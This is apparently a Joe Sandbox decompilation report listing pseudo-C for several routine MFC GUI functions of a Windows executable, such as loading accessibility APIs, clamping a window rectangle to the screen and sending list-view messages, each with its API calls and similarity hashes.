    C-Code - Quality: 100%
    			E00409F9B(intOrPtr* __ecx) {
    				struct HINSTANCE__* _t6;
    				intOrPtr* _t12;
    				void* _t13;
    
    				_t12 = __ecx;
    				E00409DB9(__ecx, _t13);
    				 *__ecx = 0x44620c;
    				_t6 = LoadLibraryA("oleacc.dll");
    				 *(_t12 + 8) = _t6;
    				 *((intOrPtr*)(_t12 + 0xc)) = GetProcAddress(_t6, "AccessibleChildren");
    				 *((intOrPtr*)(_t12 + 0x10)) = GetProcAddress( *(_t12 + 8), "AccessibleObjectFromWindow");
    				return _t12;
    			}






    APIs
      • Part of subcall function 00409DB9: __EH_prolog.LIBCMT ref: 00409DBE
      • Part of subcall function 00409DB9: #540.MFC42(?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DD5
      • Part of subcall function 00409DB9: #860.MFC42(RichEdit20A,?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DFB
    • LoadLibraryA.KERNEL32(oleacc.dll,?,?,00409F86,?,0040FC60,?,00000000), ref: 00409FAF
    • GetProcAddress.KERNEL32(00000000,AccessibleChildren), ref: 00409FC4
    • GetProcAddress.KERNEL32(?,AccessibleObjectFromWindow), ref: 00409FD1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$#540#860H_prologLibraryLoad
    • String ID: AccessibleChildren$AccessibleObjectFromWindow$oleacc.dll
    • API String ID: 327254565-1902197158
    • Opcode ID: cbeee3fc07a31d6ed5a9ef00c9a732ce3a53231801f028108b712cd7d3655a03
    • Instruction ID: b537656310bf855d8e7be808281da66fe88c8355c092a742d0a524adf848670f
    • Opcode Fuzzy Hash: cbeee3fc07a31d6ed5a9ef00c9a732ce3a53231801f028108b712cd7d3655a03
    • Instruction Fuzzy Hash: C0E04FB5600300AFC3206F2AAC06906BBE4EE91752311483FE555D3222D7B8D9448F98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 33%
    			E0041B92B(void* __ecx) {
    				char _v8;
    				signed int _t23;
    				char* _t25;
    
    				_push(__ecx);
    				_push(0x100);
    				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x369);
    				_push(0x469);
    				L0043E078();
    				_push(0x80);
    				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x469);
    				_push(0x433);
    				L0043E078();
    				_push(0x80);
    				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x4e9);
    				_push(0x434);
    				L0043E078();
    				_push(0x100);
    				_t23 =  *((intOrPtr*)(__ecx + 0x60)) + 0x569;
    				_push(_t23);
    				_push(0x435);
    				L0043E078();
    				_push(0x421);
    				L0043DFA6();
    				_push(0);
    				 *((char*)( *((intOrPtr*)(__ecx + 0x60)) + 0x368)) = _t23 & 0xffffff00 | _t23 != 0x00000000;
    				_t25 =  &_v8;
    				_push(_t25);
    				_push(0x46a);
    				_v8 = 1;
    				L0043E2DC();
    				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x60)) + 0x106c)) = _t25;
    				if(_v8 == 0) {
    					_t25 =  *((intOrPtr*)(__ecx + 0x60));
    					 *((intOrPtr*)(_t25 + 0x106c)) = 0x15;
    				}
    				return _t25;
    			}






    APIs
    • #3098.MFC42(00000469,?,00000100), ref: 0041B948
    • #3098.MFC42(00000433,?,00000080,00000469,?,00000100), ref: 0041B960
    • #3098.MFC42(00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B976
    • #3098.MFC42(00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B990
    • #4055.MFC42(00000421,00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B99C
    • #3095.MFC42(0000046A,?,00000000,00000421,00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B9C3
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3098$#3095#4055
    • String ID:
    • API String ID: 1985669295-0
    • Opcode ID: e0adc5cb59c369d3724ca548386552f2a66282b777f3f81afd3673d26348af64
    • Instruction ID: ee9ad6be540e487d0e4d593e5d69f5e544ce2a33cda72f30bcafd18c18b240c8
    • Opcode Fuzzy Hash: e0adc5cb59c369d3724ca548386552f2a66282b777f3f81afd3673d26348af64
    • Instruction Fuzzy Hash: D61191B1300714AFF3149A67CC46FEB72ACEB89B08F04002EB6818B3C1D6E5AD05C764
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0041BF08(void* __ecx, void* __eflags) {
    				void* _t31;
    				void* _t33;
    				void* _t48;
    				void* _t53;
    
    				E0043E4E0(0x4415bb, _t53);
    				_t48 = __ecx;
    				E00419DC7(_t53 - 0x1f0, 0);
    				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
    				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x2d4);
    				L0043DDD2();
    				asm("sbb eax, eax");
    				_t31 = E00429029(_t53 - 0x10,  ~( *( *((intOrPtr*)(_t53 - 0x18c)) - 8)) + 0xe071);
    				_push(_t31);
    				 *(_t53 - 4) = 1;
    				L0043DFCA();
    				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
    				L0043DD36();
    				L0043DE7A();
    				if(_t31 == 1) {
    					lstrcpynA( *((intOrPtr*)(_t48 + 0x60)) + 0x2d4,  *(_t53 - 0x118), 0x80);
    				}
    				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
    				L0040663D(_t53 - 0x1f0,  *(_t53 - 4));
    				_t33 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
    				return _t33;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 0041BF0D
      • Part of subcall function 00419DC7: __EH_prolog.LIBCMT ref: 00419DCC
      • Part of subcall function 00419DC7: #324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91
    • #860.MFC42(?,00000000), ref: 0041BF3E
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #858.MFC42(00000000,?,00000000), ref: 0041BF6C
    • #800.MFC42(00000000,?,00000000), ref: 0041BF78
    • #2514.MFC42(00000000,?,00000000), ref: 0041BF83
    • lstrcpynA.KERNEL32(?,?,00000080,00000000,?,00000000), ref: 0041BF9E
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#860$H_prolog$#1168#2514#324#537#800#858LoadStringlstrcpyn
    • String ID:
    • API String ID: 2272019338-0
    • Opcode ID: 1cd5cd69a124368ebf00bc965c59acd5a78c584da7bf2d89405eddda1ad1d14e
    • Instruction ID: 45a4ca4260a82fc295c410adc38a17f00edc715a730f85d62a835649675cfd28
    • Opcode Fuzzy Hash: 1cd5cd69a124368ebf00bc965c59acd5a78c584da7bf2d89405eddda1ad1d14e
    • Instruction Fuzzy Hash: 1B119D32E10129ABDB24EB65DC56BEDB774BF14318F0045AAE015A31C1DB78AE88CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0040D13C(void* __ecx) {
    				intOrPtr _t16;
    				void* _t18;
    				intOrPtr* _t33;
    				void* _t35;
    				void* _t37;
    
    				_t16 = E0043E4E0(0x43fe44, _t37);
    				_push(__ecx);
    				_t35 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
    					L8:
    					 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
    					return _t16;
    				}
    				if( *((intOrPtr*)(__ecx + 0xc4)) == 0) {
    					_t18 = E0040D10A(__ecx + 0xdc, _t37 - 0x10);
    					_t33 = _t35 + 0x50;
    					_push(_t18);
    					 *(_t37 - 4) = 0;
    					L0043DFCA();
    					 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
    					L0043DD36();
    					_t16 =  *_t33;
    					if( *((intOrPtr*)(_t16 - 8)) == 0 &&  *((intOrPtr*)(_t35 + 0x10c)) != 0) {
    						_t16 = E0040CC69(_t16, _t35);
    						if(_t16 == 0) {
    							L0043DE32();
    						} else {
    							_push(_t33);
    							L0043E19E();
    						}
    					}
    				}
    				_push(1);
    				_push(_t35);
    				_push( *((intOrPtr*)(_t35 + 0x50)));
    				L0043E1A4();
    				goto L8;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040D141
    • #6358.MFC42(?,?,00000001), ref: 0040D1B9
      • Part of subcall function 0040D10A: #535.MFC42 ref: 0040D119
    • #858.MFC42(00000000), ref: 0040D173
    • #800.MFC42(00000000), ref: 0040D17F
      • Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D
    • #3874.MFC42(?,?,00000000), ref: 0040D1A2
    • #2614.MFC42(?,00000000), ref: 0040D1AB
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2614#3797#3874#535#6358#800#858H_prolog
    • String ID:
    • API String ID: 2707472638-0
    • Opcode ID: b4c699001687a8589c8a22b99ecbf2f9b95626e0a4572c3f5719b2340c5e7583
    • Instruction ID: 13117b9e82df80cf6bfa14f42e6dc11a1bfac93f37c5c75042c6cc5f2cee2129
    • Opcode Fuzzy Hash: b4c699001687a8589c8a22b99ecbf2f9b95626e0a4572c3f5719b2340c5e7583
    • Instruction Fuzzy Hash: BB01A531A006119FDB24EBA6C881AAFB3A9AF59318F04453FA112661D1CFB86D05CA58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0040A3EA(void* __ecx) {
    				void* _t22;
    				void* _t23;
    				signed int _t36;
    				void* _t41;
    				void* _t43;
    
    				E0043E4E0(0x43fa13, _t43);
    				 *(_t43 - 0x10) =  *(_t43 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t43 + 0xc)));
    				_push(_t43 + 0xc);
    				_t22 = E0040FEA7();
    				_t36 = 1;
    				_push(":");
    				 *(_t43 - 4) = _t36;
    				L0043DFD6();
    				_t41 = _t22 + 2;
    				_t8 = _t41 + 0x453690; // 0x453692
    				_t23 = _t8;
    				_push(_t23);
    				L0043DFD6();
    				if(_t41 == 0xffffffff || _t23 == 0xffffffff) {
    					_push(0x4550cc);
    					L0043DE26();
    					 *(_t43 - 0x10) = _t36;
    				} else {
    					_push(_t23 - _t41);
    					_push(_t41);
    					_push( *((intOrPtr*)(_t43 + 8)));
    					L0043DFBE();
    					 *(_t43 - 0x10) = _t36;
    				}
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
    				return  *((intOrPtr*)(_t43 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040A3EF
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(00453524), ref: 0040A417
    • #2764.MFC42(00453692,00453524), ref: 0040A42A
    • #4278.MFC42(?,00000002,00000000,00453692,00453524), ref: 0040A443
    • #537.MFC42(004550CC,00453692,00453524), ref: 0040A455
    • #800.MFC42(004550CC,00453692,00453524), ref: 0040A464
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2764#537#800H_prologMessageSend$#4278#535#823#825Windowmemset
    • String ID:
    • API String ID: 3542688000-0
    • Opcode ID: f36e357d4f3614a44cf6555e482caa933f04e34653b2297cefe51644dfad52b6
    • Instruction ID: 91a84fb2c9ff9de2bcfe13fc5ea119ce7d405c0b88de35c77df034f8feff6967
    • Opcode Fuzzy Hash: f36e357d4f3614a44cf6555e482caa933f04e34653b2297cefe51644dfad52b6
    • Instruction Fuzzy Hash: 0011E536800108EBCB24EF54E845AEE7764EF44338F10822FF836961C1D7789705C795
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428FAA(struct tagRECT* _a4) {
    				int _t6;
    				signed int _t7;
    				signed int _t8;
    				long _t9;
    				long _t10;
    				int _t17;
    				struct tagRECT* _t21;
    				int _t22;
    
    				_t17 = GetSystemMetrics(0);
    				_t6 = GetSystemMetrics(1);
    				_t21 = _a4;
    				_t22 = _t6;
    				_t7 = _t21->left;
    				if(_t7 < 0) {
    					OffsetRect(_t21,  ~_t7, 0);
    				}
    				_t8 = _t21->top;
    				if(_t8 < 0) {
    					OffsetRect(_t21, 0,  ~_t8);
    				}
    				_t9 = _t21->right;
    				if(_t9 > _t17) {
    					OffsetRect(_t21, _t17 - _t9, 0);
    				}
    				_t10 = _t21->bottom;
    				if(_t10 > _t22) {
    					return OffsetRect(_t21, 0, _t22 - _t10);
    				}
    				return _t10;
    			}

    APIs
    • GetSystemMetrics.USER32 ref: 00428FB6
    • GetSystemMetrics.USER32 ref: 00428FBC
    • OffsetRect.USER32(?,00000000,00000000), ref: 00428FD6
    • OffsetRect.USER32(?,00000000,?), ref: 00428FE5
    • OffsetRect.USER32(?,00000000,00000000), ref: 00428FF4
    • OffsetRect.USER32(?,00000000,00000000), ref: 00429003
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: OffsetRect$MetricsSystem
    • String ID:
    • API String ID: 3740680172-0
    • Opcode ID: ef46aa798c0639a7aa47ac2d1b53c38a8e6631be31c0cef314ee719047698104
    • Instruction ID: 2a4e5cf9f6249bf9d097ff1f418033674d9854aaea719df39bfe471cd5fddcc9
    • Opcode Fuzzy Hash: ef46aa798c0639a7aa47ac2d1b53c38a8e6631be31c0cef314ee719047698104
    • Instruction Fuzzy Hash: 24F04F713427296BE220AA6AAD41F7BB7DCDF82754F52042AFA04D3681D694BC014AA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00419C1A(void* __eflags) {
    				void* __esi;
    				void* _t21;
    				void* _t27;
    				void* _t28;
    				void* _t39;
    				CHAR* _t41;
    				void* _t43;
    
    				E0043E4E0(0x4411db, _t43);
    				_push(_t39);
    				_t21 = E00419DC7(_t43 - 0x1f0, 0);
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				_t41 = L004044C9(_t21, _t43 - 0x1f0, _t39) + 0x1dcc;
    				_push(_t41);
    				L0043DDD2();
    				_t27 = E00429029(_t43 - 0x10, (0 |  *_t41 != 0x00000000) + 0xe065);
    				_push(_t27);
    				 *(_t43 - 4) = 1;
    				L0043DFCA();
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				L0043DD36();
    				L0043DE7A();
    				if(_t27 == 1) {
    					lstrcpynA(_t41,  *(_t43 - 0x118), 0x40);
    				}
    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
    				_t28 = L0040663D(_t43 - 0x1f0,  *(_t43 - 4));
    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
    				return _t28;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00419C1F
      • Part of subcall function 00419DC7: __EH_prolog.LIBCMT ref: 00419DCC
      • Part of subcall function 00419DC7: #324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
      • Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
      • Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91
    • #860.MFC42(-00001DCC), ref: 00419C50
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #858.MFC42(00000000,-00001DCC), ref: 00419C78
    • #800.MFC42(00000000,-00001DCC), ref: 00419C84
    • #2514.MFC42(00000000,-00001DCC), ref: 00419C8F
    • lstrcpynA.KERNEL32(-00001DCC,?,00000040,00000000,-00001DCC), ref: 00419CA2
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#860$H_prolog$#1168#2514#324#537#800#858LoadStringlstrcpyn
    • String ID:
    • API String ID: 2272019338-0
    • Opcode ID: 219e58d94362c9aed8c7965cc90d398478aab8b3fda095f3469ebcd3aebdea7e
    • Instruction ID: ead75609374426ae95b89c69f6991408ac464c185c742c3dcb5e4f35b0cbccf1
    • Opcode Fuzzy Hash: 219e58d94362c9aed8c7965cc90d398478aab8b3fda095f3469ebcd3aebdea7e
    • Instruction Fuzzy Hash: 40116171C10165DADB25E761DC16BDD7774AF15318F0045AEE11AB20C2DF781F44CA99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E004283A6(void* __ecx, char* _a4) {
    				signed int _t23;
    				char* _t25;
    				void* _t29;
    				signed int _t30;
    				void* _t42;
    				void* _t44;
    				void* _t45;
    
    				_t44 = __ecx;
    				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 1;
    				_t23 =  *(__ecx + 0xc);
    				if( *((intOrPtr*)(__ecx + 8)) >= _t23) {
    					_t29 = _t23 +  *((intOrPtr*)(__ecx + 0x10)) << 2;
    					_push(_t29);
    					L0043DD54();
    					_t42 = _t29;
    					_t30 =  *(__ecx + 0xc);
    					if(_t30 != 0) {
    						memcpy(_t42,  *(__ecx + 4), _t30 << 2);
    						_t45 = _t45 + 0xc;
    					}
    					_push( *(_t44 + 4));
    					L0043DD42();
    					 *((intOrPtr*)(_t44 + 0xc)) =  *((intOrPtr*)(_t44 + 0xc)) +  *((intOrPtr*)(_t44 + 0x10));
    					 *(_t44 + 4) = _t42;
    				}
    				_t25 = strlen(_a4) + 1;
    				_push(_t25);
    				L0043DD54();
    				 *( *(_t44 + 4) +  *(_t44 + 8) * 4) = _t25;
    				return strcpy( *( *(_t44 + 4) +  *(_t44 + 8) * 4), _a4);
    			}

    APIs
    • #823.MFC42(?,?,00000000,00428DAD,?), ref: 004283BE
    • memcpy.MSVCRT ref: 004283D5
    • #825.MFC42(?,?,00000000,00428DAD,?), ref: 004283E0
    • strlen.MSVCRT ref: 004283F4
    • #823.MFC42(00000001,00428DAD,00000000,00428DAD,?), ref: 004283FB
    • strcpy.MSVCRT(?,00428DAD,00000001,00428DAD,00000000,00428DAD,?), ref: 00428416
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823$#825memcpystrcpystrlen
    • String ID:
    • API String ID: 2118311648-0
    • Opcode ID: f3fc155ed8fa44a41e57438bee8cddc14b7eeb416edc99d220e26f0225f87f8b
    • Instruction ID: b2a9ed9ed880244802dbe9fad298d8991d9ce1444d8271da3989c9882859633d
    • Opcode Fuzzy Hash: f3fc155ed8fa44a41e57438bee8cddc14b7eeb416edc99d220e26f0225f87f8b
    • Instruction Fuzzy Hash: 9B010C76600B019FD720EF26D842D27B7F5EF98714750981EE4AAC3A61DB35F851CB14
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041F501(void* __ecx) {
    				void* _t22;
    				intOrPtr _t23;
    				void* _t35;
    				CHAR* _t38;
    				void* _t40;
    
    				E0043E4E0(0x441d6c, _t40);
    				_t38 =  *(_t40 + 0x10);
    				_t35 = LoadIconA( *(_t40 + 8), _t38);
    				if(_t35 != 0) {
    					L0043DDD8();
    					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
    					if((_t38 & 0xffff0000) != 0) {
    						 *(_t40 - 0x10) =  *(_t40 - 0x10) & 0x00000000;
    						_push(_t38);
    						L0043DDD2();
    					} else {
    						 *(_t40 - 0x10) = _t38;
    					}
    					_t23 =  *0x4554a8; // 0x0
    					E0041FBD1(0x4554a0, _t23, _t40 - 0x14);
    					ImageList_ReplaceIcon( *( *((intOrPtr*)(_t40 + 0x14)) + 4), 0xffffffff, _t35);
    					 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				_t22 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
    				return _t22;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Icon$#540#800#860H_prologImageList_LoadReplace
    • String ID:
    • API String ID: 1685302977-0
    • Opcode ID: dd370175c44d3ece78625e21dd3379f24d9aa377f0141dff7367623b5ef0326a
    • Instruction ID: 76e46a4595ce0d6162af29971bf0a00212d8004dd12f16eb7edeffd32a9e23e5
    • Opcode Fuzzy Hash: dd370175c44d3ece78625e21dd3379f24d9aa377f0141dff7367623b5ef0326a
    • Instruction Fuzzy Hash: 8601CC72800109ABCB10DF84DD06BEE7775EF85325F10022AB412A22E1DB78AE46CB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0040ED20(void* __ecx) {
    				int _t5;
    				void* _t13;
    
    				_t13 = __ecx;
    				_t5 = SendMessageA( *(__ecx + 0x248), 0x100c, 0xffffffff, 2);
    				if(_t5 != 0xffffffff) {
    					SendMessageA( *(_t13 + 0x248), 0x1008, _t5, 0);
    					_t5 = SendMessageA( *(_t13 + 0x248), 0x1004, 0, 0);
    					if(_t5 == 0) {
    						_push(0x421);
    						L0043DFA6();
    						if(_t5 != 0) {
    							_push(0x421);
    							L0043E066();
    							return SendMessageA( *(_t5 + 0x20), 0xf5, 0, 0);
    						}
    					}
    				}
    				return _t5;
    			}

    Instruction addresses: 0x0040ed2c, 0x0040ed3b, 0x0040ed40, 0x0040ed51, 0x0040ed60, 0x0040ed64, 0x0040ed6d, 0x0040ed6e, 0x0040ed75, 0x0040ed77, 0x0040ed7a, 0x00000000, 0x0040ed89, 0x0040ed75, 0x0040ed64, 0x0040ed8f

    APIs
    • SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040ED3B
    • SendMessageA.USER32(?,00001008,00000000,00000000), ref: 0040ED51
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ED60
    • #4055.MFC42(00000421), ref: 0040ED6E
    • #3092.MFC42(00000421,00000421), ref: 0040ED7A
    • SendMessageA.USER32(?,000000F5,00000000,00000000), ref: 0040ED89
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSend$#3092#4055
    • String ID:
    • API String ID: 3366912665-0
    • Opcode ID: f9498fddd1601883ff9d032e10246302414b5e35ceda410694d2e9b484e2f198
    • Instruction ID: f078b3c12c30cf52bb7425468f7ac916964146173571abe3a85cd9422e39874b
    • Opcode Fuzzy Hash: f9498fddd1601883ff9d032e10246302414b5e35ceda410694d2e9b484e2f198
    • Instruction Fuzzy Hash: 37F02EB130061977E5313223CC09E6B3E0CDF867B9F02073AF628A51F0CDA26C125624
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0041F372(intOrPtr __eax, void* __ecx) {
    				intOrPtr _t1;
    				signed int _t8;
    
    				_t1 = __eax;
    				_push(0x47e);
    				L0043DFA6();
    				_push(0x421);
    				 *0x4557c8 = __eax;
    				L0043DFA6();
    				_push(0x487);
    				 *0x4557d8 = __eax;
    				L0043DFA6();
    				_t8 = 1;
    				if(__eax == 0 ||  *0x4557d8 == 0) {
    					 *0x4557d0 =  *0x4557d0 & 0x00000000;
    				} else {
    					 *0x4557d0 = _t8;
    				}
    				_push(0x488);
    				L0043DFA6();
    				if(_t1 == 0 ||  *0x4557d8 == 0) {
    					 *0x4557d4 =  *0x4557d4 & 0x00000000;
    				} else {
    					 *0x4557d4 = _t8;
    				}
    				_push(0x422);
    				L0043DFA6();
    				 *0x4557cc = _t1;
    				L0043E300();
    				return _t1;
    			}

    Instruction addresses: 0x0041f372, 0x0041f376, 0x0041f37b, 0x0041f380, 0x0041f387, 0x0041f38c, 0x0041f391, 0x0041f398, 0x0041f39d, 0x0041f3a6, 0x0041f3a7, 0x0041f3ba, 0x0041f3b2, 0x0041f3b2, 0x0041f3b2, 0x0041f3c1, 0x0041f3c8, 0x0041f3cf, 0x0041f3e2, 0x0041f3da, 0x0041f3da, 0x0041f3da, 0x0041f3e9, 0x0041f3f0, 0x0041f3f7, 0x0041f3fc, 0x0041f403

    APIs
    • #4055.MFC42(0000047E), ref: 0041F37B
    • #4055.MFC42(00000421,0000047E), ref: 0041F38C
    • #4055.MFC42(00000487,00000421,0000047E), ref: 0041F39D
    • #4055.MFC42(00000488,00000487,00000421,0000047E), ref: 0041F3C8
